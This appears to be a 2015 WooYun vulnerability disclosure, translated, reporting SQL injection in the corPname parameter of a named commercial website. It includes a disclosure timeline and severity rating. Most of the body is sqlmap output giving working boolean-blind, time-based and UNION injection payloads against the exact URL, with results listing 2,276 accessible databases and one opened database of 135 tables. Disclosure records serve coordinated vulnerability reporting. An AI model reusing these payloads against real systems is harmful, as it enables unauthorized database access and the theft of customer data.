WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
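2015-05-25: Details reported to the vendor; awaiting vendor handling
2015-05-25: Vendor has confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and experts in related fields
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to trainee white hats
2015-07-09: Details disclosed to the public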
233
http://m.300.cn/Maps.do?corPname=&method=showFilter (parameter: corPname)
---
Parameter: corPname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: corPname=' AND 2862=2862 AND 'wtwI' LIKE 'wtwI&method=showFilter

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: corPname=' AND (SELECT * FROM (SELECT(SLEEP(5)))cAvP) AND 'Reak' LIKE 'Reak&method=showFilter

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: corPname=' UNION ALL SELECT CONCAT(0x717a7a7071,0x5377745458554d554462,0x7171707671),NULL#&method=showFilter
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [2276]:

Opening one at random:

Database: ZTS_ZM_KO_2014031200065
[135 tables]

A large amount of information is involved.
Requesting rank 20!
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-05-25 10:51
Being handled
None yet